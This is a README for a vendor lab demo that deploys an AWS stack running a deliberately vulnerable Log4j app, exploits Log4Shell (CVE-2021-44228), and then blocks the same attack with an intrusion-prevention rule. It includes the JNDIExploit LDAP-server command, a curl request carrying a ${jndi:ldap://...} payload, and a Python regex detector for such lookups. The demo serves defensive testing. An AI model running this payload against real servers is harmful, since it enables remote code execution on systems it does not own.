POC details: dd966fbbc56e6ed999703b1e49c1d3241922e225

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j contains a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j, and remote code execution is triggered when that request is written to the log.
Description
Quick deploy to showcase CVE-2021-44228
Introduction
# Cloud One - Workload Security Log4Shell
This repo contains a quick deployment template to showcase the CVE-2021-44228 (Log4Shell) exploit and Workload Security Intrusion Prevention.

### Note on CFT deployment in AWS regions
- I only added AMI IDs for US-EAST-1, US-EAST-2, US-WEST-1, US-WEST-2, CA-CENTRAL-1, SA-EAST-1, EU-WEST-1.

## Deploy CloudFormation Template

Parameters to Define:
- **KeyPair**: name of an existing EC2 key pair
- **IPforSSH**: CIDR allowed to reach SSH; restrict it to your own IP. The default is 0.0.0.0/0 (open to everyone).

[![Launch Stack](https://cdn.rawgit.com/buildkite/cloudformation-launch-stack-button-svg/master/launch-stack.svg)](https://console.aws.amazon.com/cloudformation/home#/stacks/new?stackName=c1-ws-log4shell&templateURL=https://aws-workshop-c1as-cft-templates.s3.amazonaws.com/c1-ws-log4shell.yaml)

![architecture](images/architecture.png)

---

## After CloudFormation Template Deployment

## 1. SSH into the EC2 instance (Shell A)

```bash
sudo su
<Deploy Workload Security Agent deployment script with Linux Policy attached.>
```
![deployment_script](images/deploymentscript.png)

## 2. In Cloud One-WS: assign the IPS rule for CVE-2021-44228 to the Linux machine
- IPS rule number: **1011242** or **1008610**
- Assign the rule and change it to **Detect Only** for now.
- Accept all rule dependencies.

[Click here for additional coverage on Apache Log4j "Log4Shell" Remote Code Execution 0-Day Vulnerability (CVE-2021-44228)](https://success.trendmicro.com/solution/000289940)

![ips_rule](images/ipsrule.png)

![detect_only](images/detectonly.png)

---

## 3. Start the Docker app (Shell A)

```bash
cd log4shell-vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```
![docker_run](images/dockerstart.png)

---

## 4. Open a second SSH session (Shell B) and run the command to create the LDAP server
* [JNDIExploit](https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) provided by feihong-cs, before it was removed from GitHub.
```bash
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
```

## 5. Run the exploit
- Open a new SSH session (Shell C)

```bash
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
```
Notice the output of JNDIExploit (Shell B), showing that it has sent the malicious LDAP response and served the second-stage payload:

![shell-b](images/shell-b.png)

---

## 6. Confirm the RCE succeeded by checking that the `pwned` file created in step 5 exists in the running container's /tmp directory
- Using Shell C

```bash
docker exec vulnerable-app ls /tmp
```
![shell-c](images/shell-c.png)

---

## Repeat the attack, this time with the IPS rule set to **Prevent**
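To make the Detect Only / Prevent distinction from step 2 concrete, here is an added example (not part of this repo and not Trend Micro's rule logic) that inspects request headers for a Log4j JNDI lookup and either logs or blocks the request depending on the configured mode. The sample headers are constructed; the first one mirrors the curl command in step 5 with a placeholder address.

```python
import re
from urllib.parse import unquote

# A Log4j lookup that dereferences a JNDI provider, e.g. ${jndi:ldap://host:1389/...}.
# Case-insensitive, and tolerant of whitespace around the separators.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop)\s*:", re.IGNORECASE)


def inspect_header(name, value):
    """Return a finding dict if the header value carries a JNDI lookup, else None."""
    decoded = unquote(value)  # also catch the same payload sent percent-encoded
    match = JNDI_LOOKUP.search(decoded)
    if match is None:
        return None
    return {"header": name, "scheme": match.group(1).lower(), "value": decoded}


def apply_policy(headers, mode):
    """Mimic the two IPS modes from step 2: 'detect' only logs, 'prevent' blocks.

    Returns (action, findings) where action is 'allow', 'log' or 'block'.
    """
    findings = [f for f in (inspect_header(n, v) for n, v in headers) if f]
    if not findings:
        return "allow", findings
    return ("block" if mode == "prevent" else "log"), findings


# Constructed request headers. 10.0.0.5 is a placeholder for the LDAP listener address.
SAMPLE_HEADERS = [
    ("Host", "127.0.0.1:8080"),
    ("User-Agent", "curl/7.79.1"),
    ("X-Api-Version", "${jndi:ldap://10.0.0.5:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}"),
]
BENIGN_HEADERS = [("Host", "127.0.0.1:8080"), ("X-Api-Version", "1.2.3")]

if __name__ == "__main__":
    for mode in ("detect", "prevent"):
        action, findings = apply_policy(SAMPLE_HEADERS, mode)
        print(f"{mode}: {action} on {[f['header'] for f in findings]}")
```

This simple pattern covers the plain lookup string used in this demo only; the vendor IPS rules referenced in step 2 should be relied on for broader coverage.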


## Reference
- Thank you [christophetd](https://github.com/christophetd/log4shell-vulnerable-app) for providing the vulnerable Spring Boot web application.
- Trend Micro Success: https://success.trendmicro.com/solution/000289940
- This web-based tool can help identify server applications that may be affected by Log4Shell: https://log4j-tester.trendmicro.com/
